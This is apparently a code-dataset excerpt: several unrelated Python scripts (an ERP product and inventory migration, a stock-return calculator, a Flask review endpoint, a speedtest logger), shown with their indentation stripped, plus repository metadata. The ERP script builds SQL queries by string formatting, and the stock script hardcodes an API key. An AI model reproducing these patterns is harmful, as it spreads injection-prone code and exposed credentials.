data_cp = pd.DataFrame(data_cp.iloc[1:].values, columns=data_cp.iloc[0, :])
print(data_cp.columns)
print(data_cp.head())
# 增加specs_one,specs_two,is_delete,category项
data_cp['specs_one'] = data_cp['规格']
data_cp['specs_two'] = data_cp['规格']
data_cp['is_delete'] = np.where(data_cp['状态'] == '已删除', 1, 0)
data_cp['category'] = data_cp['斑马类目']
# 删除spu 和sku状态为已删除的records
data_cp['delete'] = data_cp['is_delete']
data_cp['delete'] = np.where(data_cp['SPU状态'] == '已删除', 1, data_cp['delete'])
data_cp = data_cp[data_cp['delete'] != 1]
data_cp = data_cp.drop(columns='delete')
data_cp = data_cp.reset_index()
# 修改specs_one(color) specs_two(size) spu图集(用','分割)
for i in range(data_cp.shape[0]):
# 修改category为品类的根结点
data_cp.loc[i, 'category'] = str(data_cp.loc[i, 'category']).split('»')[-1]
data_cp.loc[i, 'SPU图集'] = data_cp.loc[i, 'SPU图集'].replace('\n', ',')
if len(data_cp.loc[i, 'specs_two'].split(';')) >= 2:
data_cp.loc[i, 'specs_two'] = data_cp.loc[i, 'specs_two'].split(';')[1]
data_cp.loc[i, 'specs_one'] = data_cp.loc[i, 'specs_one'].split(';')[0]
elif len(data_cp.loc[i, 'specs_two']) > 2 and data_cp.loc[i, 'specs_two'] != 'One Size':
data_cp.loc[i, 'specs_one'] = data_cp.loc[i, 'specs_one']
data_cp.loc[i, 'specs_two'] = np.nan
else:
data_cp.loc[i, 'specs_two'] = data_cp.loc[i, 'specs_two']
data_cp.loc[i, 'specs_one'] = np.nan
# size同类合并
data_cp['specs_two'] = np.where(
(data_cp['specs_two'] == 'One-Size') | (data_cp['specs_two'] == 'one-size') | (data_cp['specs_two'] == 'One Size'),
'One Size', data_cp['specs_two'])
# 得到size 和color的唯一值(用于创建product_attr表)
specs_two = data_cp['specs_two'].unique()
specs_one = data_cp['specs_one'].unique()
# 删除含有中文字符的值
specs_two = is_chinese(specs_two)
specs_one = is_chinese(specs_one)
for i in range(data_cp.shape[0]):
if data_cp.loc[i, '标题'].startswith('\"'):
data_cp.loc[i, '标题'] = data_cp.loc[i, '标题'].replace('\"','\'')
# 给数据库中product表插入数据:
"""
product 插入数据
"""
data_cp.to_excel('/Users/edz/Documents/data_cp.xlsx')
# 插入data_cp表中spu数据
for i in range(data_cp.shape[0]):
with conn.cursor() as cursor:
# 以spu_code为primary key 进行插入数据
sql = "select spu_code from product where spu_code='{0}'".format(data_cp.loc[i, 'SPU编码'])
cursor.execute(sql)
r = cursor.fetchone()
if r is None:
sql = '''INSERT INTO product (product_name,spu_code, primary_image, add_time, product_images, zebra_spu_id) VALUES ("{0}",'{1}','{2}',now(),'{3}',{4})'''.format(
data_cp.loc[i, '标题'], data_cp.loc[i, 'SPU编码'], data_cp.loc[i, 'SPU图片'],
data_cp.loc[i, 'SPU图集'], int(data_cp.loc[i, '系统SPUID']))
engine.execute(sql)
else:
sql = '''UPDATE product SET product_name ="{0}",primary_image = "{2}",add_time=now(),product_images="{3}",zebra_spu_id={4} WHERE spu_code = "{1}"'''.format(
data_cp.loc[i, '标题'], data_cp.loc[i, 'SPU编码'], data_cp.loc[i, 'SPU图片'],
data_cp.loc[i, 'SPU图集'], int(data_cp.loc[i, '系统SPUID']))
engine.execute(sql)
print('刷完产品')
"""
更新data_cp表中的product_id
"""
# 取出刚刚写入数据库里的product表及其id,根据spu,插入到data_cp里
data_p_id = pd.read_sql_table('product', engine)
data_p_id = data_p_id[['id', 'spu_code']]
data_cp = data_cp.merge(data_p_id, left_on='SPU编码', right_on='spu_code')
# 给数据库中product attr表插入数据
# 插入color属性
"""
product_attr 插入数据
需要: specs_one, specs_two 两个关于color属性和size属性的table
"""
# for i in range(len(specs_one)):
# with conn.cursor() as cursor:
# sql = "select attr_name from product_attr where attr_name='{0}'".format(specs_one[i])
# cursor.execute(sql)
# r = cursor.fetchone()
# if r is None:
# sql = "INSERT INTO product_attr (attr_name, parent_id, ancilla) VALUES ('{0}', 1, NULL)".format(
# specs_one[i])
# engine.execute(sql)
#
# # 插入size属性
# for i in range(len(specs_two)):
# with conn.cursor() as cursor:
# sql = "select attr_name from product_attr where attr_name='{0}'".format(specs_two[i])
# cursor.execute(sql)
# r = cursor.fetchone()
# if r is None:
# sql = "INSERT INTO product_attr (attr_name, parent_id, ancilla) VALUES ('{0}', 2, NULL)".format(
# specs_two[i])
# engine.execute(sql)
"""
更新data_cp表中的specs_one_id和specs_two_id
删除data_cp中属性含有中文字,并把属性id同步到data_cp表中
"""
# 将插入完成后的product_attr表读出,
data_product_attr = pd.read_sql_table('product_attr', engine)
# 删除data_cp里,color或size属性带中文字符的records
for i in range(data_cp.shape[0]):
if not data_cp.loc[i, 'specs_one'] in specs_one:
data_cp.loc[i, 'specs_one'] = -1
if not data_cp.loc[i, 'specs_two'] in specs_two:
data_cp.loc[i, 'specs_two'] = -1
data_cp = data_cp[~((data_cp['specs_two'] == -1) | (data_cp['specs_one'] == -1))]
# 并且通过合并product_attr表,来获取每行size和color属性对应的属性id
cur = data_cp.merge(data_product_attr, left_on='specs_one', right_on='attr_name', how='left')
data_cp = cur.merge(data_product_attr, left_on='specs_two', right_on='attr_name', how='left')
data_cp = data_cp.astype(object).where(pd.notnull(data_cp), "NULL")
# 添加sku main进数据库:
"""
sku_main插入数据
需要data_cp(包括更新的product_id 和specs_id)
"""
for i in range(data_cp.shape[0]):
with conn.cursor() as cursor:
# 以sku_code为primary key 进行插入数据,查看要插入的数据sku
sql = "select sku_code from sku_main where sku_code='{0}'".format(data_cp.loc[i, 'SKU编码'])
cursor.execute(sql)
r = cursor.fetchone()
# 如果返回为none,则说明该sku不存在于数据库,进行插入操作
if r is None:
sql = 'INSERT INTO sku_main (sku_code,product_id ,specs_one, specs_two, specs_three, ' \
'cost_price, cost_currency, sale_price, sale_currency,' \
'sku_style, primary_image, is_delete, add_time,' \
'secondary_images, weight, length, height, width, name,' \
'en_name, is_effective, zebra_sku_id) ' \
'VALUES ("{0}",{1},{2},{3},NULL,{4},"RMB",NULL,"USD",NULL,"{5}",{6},now(),"{7}",{8},{9},{10},{11},NULL,NULL, 1,{12})'.format(
data_cp.loc[i, 'SKU编码'], data_cp.loc[i, 'id_x'], data_cp.loc[i, 'id_y'], data_cp.loc[i, 'id'],
data_cp.loc[i, '成本价'], data_cp.loc[i, 'SKU图'], data_cp.loc[i, 'is_delete'],
data_cp.loc[i, 'SPU图集'], data_cp.loc[i, '重量'], data_cp.loc[i, '长'], data_cp.loc[i, '高'],
data_cp.loc[i, '宽'], int(data_cp.loc[i, 'SKUID']))
engine.execute(sql)
else:
sql = '''UPDATE sku_main SET product_id ={1},specs_one = {2},specs_two={3},cost_price={4},cost_currency="RMB", sale_currency = "USD",primary_image = "{5}",
is_delete= {6},add_time = now(),secondary_images = "{7}", weight = {8}, length = {9},height ={10}, width = {11}, is_effective = 1,zebra_sku_id = {12}
WHERE sku_code = "{0}"'''.format(
data_cp.loc[i, 'SKU编码'], data_cp.loc[i, 'id_x'], data_cp.loc[i, 'id_y'], data_cp.loc[i, 'id'],
data_cp.loc[i, '成本价'], data_cp.loc[i, 'SKU图'], data_cp.loc[i, 'is_delete'],
data_cp.loc[i, 'SPU图集'], data_cp.loc[i, '重量'], data_cp.loc[i, '长'], data_cp.loc[i, '高'],
data_cp.loc[i, '宽'], int(data_cp.loc[i, 'SKUID']))
engine.execute(sql)
print('刷完sku_main')
"""
插入product_tag表所有标签
需要data_cp中所有的标签集合
"""
# 设置tag list来储存所有标签属性(unique),剔除所有标签为空的records
tag = []
notnull_cp = data_cp[~(data_cp['标签'] == "NULL")]
for i in range(notnull_cp.shape[0]):
tag += str(notnull_cp.iloc[i, 4]).split(',')
tag = list(set(tag))
# 将得到的标签属性值导入到数据库的product_tag表中,得到tag对应的tag_id
# for i in range(len(tag)):
# with conn.cursor() as cursor:
# sql = '''SELECT * FROM product_tag WHERE tag_name = "{0}" '''.format(tag[i])
# cursor.execute(sql)
# r = cursor.fetchone()
# if r is None:
# sql = '''INSERT INTO product_tag (tag_name, add_time) VALUES ("{0}",now())'''.format(tag[i])
# engine.execute(sql)
# 设置id list和tag list 将data_cp中的id和该id对应的多个tag组成二元tuple
tr_id = []
tr_tag = []
notnull_cp = notnull_cp.reset_index()
for i in range(notnull_cp.shape[0]):
if ',' not in str(notnull_cp.loc[i, '标签']):
tr_id.append(notnull_cp.loc[i, 'id_x'])
tr_tag.append(notnull_cp.loc[i, '标签'])
else:
for tags in str(notnull_cp.loc[i, '标签']).split(','):
if len(tags) > 1:
tr_id.append(notnull_cp.loc[i, 'id_x'])
tr_tag.append(tags)
tuples = list(zip(tr_id, tr_tag))
# 将这两列转化为dataframe
tr = pd.DataFrame(tuples, columns=['product_id', 'tags_name'])
# 删除重复项
tr = tr.drop_duplicates()
# 读出product_tag得到tag及其对应的id,将tag_id通过tag_name合并到product_id上
product_tag = pd.read_sql_table('product_tag', engine)
tr = tr.merge(product_tag, left_on='tags_name', right_on='tag_name', how='left')
tr = tr.dropna(subset=['id'])
tr = tr.reset_index()
"""
插入product_tag_relation表所有tag_id和product_id对应关系
需要tr表(有tag_id 和 product_id 以及 tag_name)
"""
# 将tag_id,product_id写入到product_tag_relation表
for i in range(tr.shape[0]):
with conn.cursor() as cursor:
sql = '''SELECT * FROM product_tag_relation WHERE tag_id = {0} and product_id = {1}'''.format(tr.loc[i, 'id'], tr.loc[i, 'product_id'])
cursor.execute(sql)
r = cursor.fetchone()
if r is None:
sql = '''INSERT INTO product_tag_relation (tag_id, product_id) VALUES ({0},{1})'''.format(
tr.loc[i, 'id'], tr.loc[i, 'product_id'])
engine.execute(sql)
print('刷完product_tag_relation')
"""
更新product中的supplier_id数据
需要supplier表和data_cp
"""
# 从数据库中读出供应商表,并筛选出supplier_name和对应的id
supplier = pd.read_sql_table('supplier', engine)
supplier = supplier[['id', 'supplier_name']]
supplier.rename(columns={'id': 'supplier_id'}, inplace=True)
# 将供应商id加到data_cp中,通过供应商名字
data_cp = data_cp.merge(supplier, left_on='默认供应商', right_on='supplier_name', how='left')
# 更新product表中的供应商id
for i in range(data_cp.shape[0]):
with conn.cursor() as cursor:
try:
sql = 'UPDATE product SET supplier_id ={0} WHERE spu_code = "{1}"'.format(data_cp.loc[i, 'supplier_id'],
data_cp.loc[i, 'SPU编码'])
engine.execute(sql)
except:
continue
print('刷完product中supplier id')
# 从数据库中读出品类,并筛选出category_name和对应的id
category = pd.read_sql_table('product_category', engine)
category = category[['id', 'category_name']]
# 删除品类中的字符串的首位空格
for i in range(data_cp.shape[0]):
data_cp.loc[i, 'category'] = trim(data_cp.loc[i, 'category'])
category.rename(columns={'id': 'category_id'}, inplace=True)
# 将品类id对应带data_cp上通过category
data_cp = data_cp.merge(category, left_on='category', right_on='category_name', how='left')
# data_cp.to_excel('/Users/edz/Documents/data_cp.xlsx')
data_cp = data_cp.dropna(subset = ['category_id'])
data_cp = data_cp.reset_index()
"""
更新product表中的category_id
data_cp表中的category和product_category中的id
"""
# 更新product中的品类id
for i in range(data_cp.shape[0]):
with conn.cursor() as cursor:
sql = 'UPDATE product SET product_category={0} WHERE spu_code = "{1}"'.format(data_cp.loc[i, 'category_id'],
data_cp.loc[i, 'SPU编码'])
engine.execute(sql)
print('刷完product中product category id')
# 从数据库product表中读取供应商id和产品id
sup = pd.read_sql_table('product', engine)
sup = sup[['id', 'supplier_id']]
sup = sup[~sup['supplier_id'].isnull()][['supplier_id', 'id']]
# 删除重复项
sup = sup.drop_duplicates()
sup = sup.reset_index()
"""
插入product_supplier表中supplier_id, product_id
需要product表获取product_id和supplier_id
"""
# 将供应商id和产品id导入到product_supplier表中
for i in range(sup.shape[0]):
with conn.cursor() as cursor:
sql = '''SELECT * FROM product_supplier WHERE supplier_id = {0} AND product_id = {1}'''.format(
sup.iloc[i, 0], sup.iloc[i, 1])
cursor.execute(sql)
r = cursor.fetchone()
if r is None:
sql = '''INSERT INTO product_supplier (supplier_id, product_id) VALUES ({0}, {1})'''.format(
sup.iloc[i, 0], sup.iloc[i, 1])
engine.execute(sql)
print('刷完product_supplier')
# 更新sku_id_code_dic数据库
sku_id_code_dic = data_cp[['SKUID', '系统SPUID', 'SKU编码', '成本价', '重量']]
sku_id_code_dic = sku_id_code_dic.drop_duplicates()
sku_id_code_dic = sku_id_code_dic.reset_index()
# for i in range(sku_id_code_dic.shape[0]):
# with conn.cursor() as cursor:
# # 以spu_id sku_id,为primary key 进行插入数据
# sql = "select sku_code from sku_id_code_dic where spu_id='{0}' and sku_id='{1}'".format(sku_id_code_dic.loc[i, '系统SPUID'],sku_id_code_dic.loc[i, 'SKUID'])
# cursor.execute(sql)
# r = cursor.fetchone()
# if r is None:
# sql = '''INSERT INTO sku_id_code_dic (sku_id,spu_id, sku_code, sku_price, sku_weight) VALUES ({0},{1},'{2}',{3},{4})'''.format(
# int(sku_id_code_dic.loc[i, 'SKUID']), int(sku_id_code_dic.loc[i, '系统SPUID']), sku_id_code_dic.loc[i, 'SKU编码'],
# sku_id_code_dic.loc[i, '成本价'], sku_id_code_dic.loc[i, '重量'])
# engine.execute(sql)
url = 'https://erp.banmaerp.com/Stock/SelfInventory/ExportDetailHandler'
data = 'filter=%7B%22Quantity%22%3A%7B%22Sort%22%3A-1%7D%2C%22WarehouseID%22%3A%7B%22Value%22%3A%5B%22adac18f9-a30e-4a4b-937f-ac6700e80334%22%5D%7D%2C%22Pager%22%3A%7B%22PageSize%22%3A10000%2C%22PageNumber%22%3A1%7D%7D'
r = requests.post(url=url, headers=headers, data=data)
file_name = PATH + '/本地产品导出.xlsx'.format(dt.datetime.now().date())
with open(file_name, 'wb') as file:
file.write(r.content)
d = read_table(file_name)
print(d.head())
print(d.columns)
data = xlrd.open_workbook(file_name)
os.remove(file_name)
table = data.sheets()[0]
nrows = table.nrows
col_dic = {}
index = 1
cur_test = conn.cursor()
# 获取字段名称
for col_index in table.row(0):
col_dic[index] = col_index.value
index += 1
# 开始处理数据
for row in range(1, nrows):
print(row)
data_list = []
i = 1
col_item_dic = {}
# 获取一行数据
for col in table.row(row):
col_item_dic[col_dic[i]] = col.value
i += 1
# 判断货位是否存在
sql = '''select id from warehouse_location where warehouse_location_code='{0}' and warehouse_id = 1'''.format(col_item_dic['货位'])
cur_test.execute(sql)
r = cur_test.fetchone()
if r is None:
sql = '''insert into warehouse_location(warehouse_id, warehouse_location_code) values(1, '{0}')'''.format(col_item_dic['货位'])
print(sql)
cur_test.execute(sql)
location_id = conn.insert_id()
print('插入新货位成功')
print(location_id)
conn.commit()
else:
location_id = r[0]
print('刷完库位')
# # 判断是否有SKU
# get_sku_id_sql = '''select id from sku_main where sku_code = '{0}' '''.format(col_item_dic['本地SKU'])
# cur_test.execute(get_sku_id_sql)
# r = cur_test.fetchone()
# if r is None:
# print(col_item_dic['本地SKU'] + '不存在sku_main里面!!')
# continue
# else:
# sku_id = r[0]
# # 更新库存
# total_num = col_item_dic['库存总量'] if '库存总量' in col_item_dic else 'NULL'
# free_num = col_item_dic['合格空闲量'] if '合格空闲量' in col_item_dic else 'NULL'
# lock_num = col_item_dic['合格锁定量'] if '合格锁定量' in col_item_dic else 'NULL'
# imperfect_num = col_item_dic['残次总量'] if '残次总量' in col_item_dic else 'NULL'
#
# total_num = int(total_num) if total_num != '' else 'NULL'
# free_num = int(free_num) if free_num != '' else 'NULL'
# lock_num = int(lock_num) if lock_num != '' else 'NULL'
# imperfect_num = int(imperfect_num) if imperfect_num != '' else 'NULL'
#
# get_exist_stock = '''select id from warehouse_stock where sku_id={0} and warehouse_id = 1 and warehouse_location_id = {1}'''.format(sku_id, location_id)
# cur_test.execute(get_exist_stock)
# r = cur_test.fetchone()
# if r is None:
# insert_sql = '''insert into warehouse_stock(sku_id,warehouse_id,warehouse_location_id,total_num,free_num,lock_num,imperfect_num)
# values({0},1,{1},{2},{3},{4},{5})'''.format(sku_id, location_id, total_num, free_num, lock_num, imperfect_num)
# # print(insert_sql)
# cur_test.execute(insert_sql)
# conn_test.commit()
# else:
# update_sql = '''update warehouse_stock set total_num = {0}, free_num = {1}, lock_num = {2}, imperfect_num = {3}
# where sku_id = {4} and warehouse_id = {5} and warehouse_location_id = {6}'''.format(total_num, free_num, lock_num, imperfect_num, sku_id, 1, location_id)
# # print(update_sql)
# cur_test.execute(update_sql)
# conn_test.commit() | yourant/ERPdata_Transfer | products_transfer.py | products_transfer.py | py | 21,610 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "openpyxl.load_workbook",
"line_number": 11,
"usage_type": "call"
},
{
"api_name": "pandas.DataFrame",
"line_number": 13,
"usage_type": "call"
},
{
"api_name": "pandas.DataFrame",
"line_number": 14,
"usage_type": "call"
},
{
"api_name": "sqlalchemy.c... |
1119194210 | # -*- coding: utf-8 -*-
"""
Created on Mon Jun 19 11:21:13 2023
@author: nmorales
"""
from requests.auth import HTTPBasicAuth
import requests
import json
import matplotlib
import pandas as pd
import numpy as np
url_cotizacion = 'https://cloud.biva.mx/stock-exchange/BIVA/quote?isin=MX01AM050019&period=Y&quantity=5'
headers = {"x-api-key": '5tbGgJp5Bq4yGPGaLcaUE8K7dUe83uxO94GYLjIq'}
response_cotizacion = requests.get(url=url_cotizacion, headers=headers)
data_cotizacion=response_cotizacion.json()
data_cotizacion=pd.DataFrame(data_cotizacion['timeSeries']).set_index('dateInMillis')
###########################
############################### SIMPLE RETURN
###########################
data_cotizacion['Simple_Return'] =(data_cotizacion['close']/data_cotizacion['close'].shift(1))-1 #(P1/p0)-1
print (data_cotizacion['Simple_Return'])
data_cotizacion.count(axis=1)
data_cotizacion['Simple_Return'].plot(figsize=(8,5))
avg_returns_d=data_cotizacion['Simple_Return'].mean()
print(avg_returns_d)
#####################################################
##this is the mean return annually (250) days
###############################################
avg_returns_a=data_cotizacion['Simple_Return'].mean()*250
avg_returns_a_str=str(round(avg_returns_a,5)*100)+' %'
print(avg_returns_a_str) ##aqui sale un 12% lo cual indica que se tiene un retorno anual promedio de 12%
###########################
############################### Logarithmic RETURN
###########################
data_cotizacion['Logarithmic_Return'] =np.log(data_cotizacion['close']/data_cotizacion['close'].shift(1)) #(P1/p0)-1
print(data_cotizacion['Logarithmic_Return'])
####se usa el precio de cierre de hoy entre el de ayer y se le resta uno ese sería el retorno simple
#print(PG['Simple_Return'])
#print(PG['Adj Close'])
data_cotizacion['Logarithmic_Return'].plot(figsize=(8,5))
#####################################################
##this is the mean return is a super small number lower than 1% because is daily
###############################################
log_returns_d=data_cotizacion['Logarithmic_Return'].mean()
#####################################################
##this is the mean return annually (250) days
###############################################
log_returns_a=data_cotizacion['Logarithmic_Return'].mean()*250
log_returns_a_str=str(round(log_returns_a,5)*100)+' %'
print(log_returns_a_str) ##aqui sale un 10% lo cual indica que se tiene un retorno anual promedio de 10%
| NRMAnaya/PythonForFinance | RateOfReturn/Simple&LogarithmicReturnBIVACLOUD.py | Simple&LogarithmicReturnBIVACLOUD.py | py | 2,522 | python | es | code | 0 | github-code | 36 | [
{
"api_name": "requests.get",
"line_number": 19,
"usage_type": "call"
},
{
"api_name": "pandas.DataFrame",
"line_number": 22,
"usage_type": "call"
},
{
"api_name": "numpy.log",
"line_number": 54,
"usage_type": "call"
}
] |
31872554645 | import os
from services.connect import *
from flask import Blueprint, jsonify, request
from flask_cors import cross_origin
from dotenv import load_dotenv
import uuid
load_dotenv()
review_blueprint = Blueprint('reviews', __name__)
MONGODB_CONNECTION_STRING = os.getenv("MONGO_URI")
MONGODB_DATABASE = 'ch'
# POST create a user
@review_blueprint.route('/reviews', methods=['POST'])
@cross_origin(headers=['Content-Type', 'Authorization'])
def create_review():
data = request.get_json()
client, collection = connect_mongo('reviews')
newReview = {}
newReview['_id'] = uuid.uuid4()
newReview['title'] = data['title']
newReview['ratings'] = data['ratings']
newReview['content'] = data['content']
collection.insert_one(newReview)
client.close()
return jsonify(newReview), 201
| dp3why/dessert-service | controllers/review_controller.py | review_controller.py | py | 819 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "dotenv.load_dotenv",
"line_number": 8,
"usage_type": "call"
},
{
"api_name": "flask.Blueprint",
"line_number": 10,
"usage_type": "call"
},
{
"api_name": "os.getenv",
"line_number": 12,
"usage_type": "call"
},
{
"api_name": "flask.request.get_json",
... |
17092139917 | import os
import speedtest_cli as speedtest
import datetime
import sqlite3
import time
from sqlite3 import Error
from xml.etree import ElementTree
from xml.etree.ElementTree import Element
from xml.etree.ElementTree import SubElement
try:
urltocheck = os.environ['UPCHECK_URLTOCHECK']
except os.error as e:
print(e)
exit(1)
try:
dbfile = os.environ['UPCHECK_DB_LOCATION']
except os.error as e:
print(e)
exit(1)
def dbconnect(dbfile):
try:
connection = sqlite3.connect(dbfile)
print(sqlite3.version)
connection.close()
except Error as t:
print(t)
exit(1)
def db_createtable(dbfile):
try:
connection = sqlite3.connect(dbfile)
cursor = connection.cursor()
sql = 'CREATE TABLE IF NOT EXISTS upcheck (record_number integer PRIMARY KEY AUTOINCREMENT, timestamp TIMESTAMP, download INTEGER, upload INTEGER, ping INTEGER)'
cursor.execute(sql)
except Error as t:
print(t)
exit(1)
def write_out_record(dbfile, timestamp, download, upload, ping):
try:
connection = sqlite3.connect(dbfile, detect_types=sqlite3.PARSE_DECLTYPES)
cursor = connection.cursor()
cursor.execute("INSERT INTO upcheck VALUES (NULL, ?, ?, ?, ?)", (timestamp, download, upload, ping))
connection.commit()
connection.close()
except Error as t:
print(t)
def average(input):
return sum(input) / len(input)
def get_average_data():
connection = sqlite3.connect(dbfile, detect_types=sqlite3.PARSE_DECLTYPES)
cursor = connection.cursor()
yesterday = (datetime.datetime.now()) - (datetime.timedelta(days=1))
cursor.execute("SELECT download FROM upcheck WHERE timestamp > ?", (yesterday,))
results = cursor.fetchall()
selected_results = []
for result in results:
selected_results.append(result[0])
speedtest_dl_averrage = average(selected_results)
speedtest_dl_averrage = round(speedtest_dl_averrage,2)
cursor.execute("SELECT upload FROM upcheck WHERE timestamp > ?", (yesterday,))
results = cursor.fetchall()
selected_results = []
for result in results:
selected_results.append(result[0])
speedtest_ul_average = average(selected_results)
speedtest_ul_average = round(speedtest_ul_average,2)
cursor.execute("SELECT ping FROM upcheck WHERE timestamp > ?", (yesterday,))
results = cursor.fetchall()
selected_results = []
for result in results:
selected_results.append(result[0])
speedtest_ping_average = average(selected_results)
speedtest_ping_average = round(speedtest_ping_average,2)
average_array = []
average_array.append(speedtest_dl_averrage)
average_array.append(speedtest_ul_average)
average_array.append(speedtest_ping_average)
return average_array
def run_speedtest():
stest = speedtest.Speedtest()
stest.get_servers()
stest.get_best_server()
stest.download()
stest.upload()
return stest.results
def bits_to_bytes(inputvalue):
bits = inputvalue
megabits = bits / 1000000
megabits = format(megabits, '.2f')
return megabits
def primary_operation():
print("Running Speedtest")
stest_result = run_speedtest()
download_speed = str(bits_to_bytes(stest_result.download))
upload_speed = str(bits_to_bytes(stest_result.upload))
ping = str(stest_result.ping)
timestamp = datetime.datetime.now()
write_out_record(dbfile, timestamp, download_speed, upload_speed, ping)
average_dl = str(get_average_data()[0])
average_ul = str(get_average_data()[1])
average_ping = str(get_average_data()[2])
xml_root = Element('SpeedtestResults')
SubElement(xml_root, "average_dl").text = average_dl
SubElement(xml_root, "average_ul").text = average_ul
SubElement(xml_root, "average_ping").text = average_ping
xml_output = ElementTree.tostring(xml_root, encoding='unicode')
xml_output_file = open(xml_web_output, "w+")
xml_output_file.write(xml_output)
xml_web_output = "/usr/share/nginx/html/upcheck-speedtest.xml"
try:
dbconnect(dbfile)
except Error as e:
print("Could not connect to database")
print(e)
exit(1)
try:
db_createtable(dbfile)
print("UpCheck Scheduled Tasks are Active")
except Error as e:
print("Unable to Create Table")
print(e)
exit(1)
while True:
primary_operation()
time.sleep(3000)
| overallcoma/upcheck | upcheck-client/upcheck-client-scheduledtasks.py | upcheck-client-scheduledtasks.py | py | 4,428 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "os.environ",
"line_number": 12,
"usage_type": "attribute"
},
{
"api_name": "os.error",
"line_number": 13,
"usage_type": "attribute"
},
{
"api_name": "os.environ",
"line_number": 17,
"usage_type": "attribute"
},
{
"api_name": "os.error",
"line_nu... |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.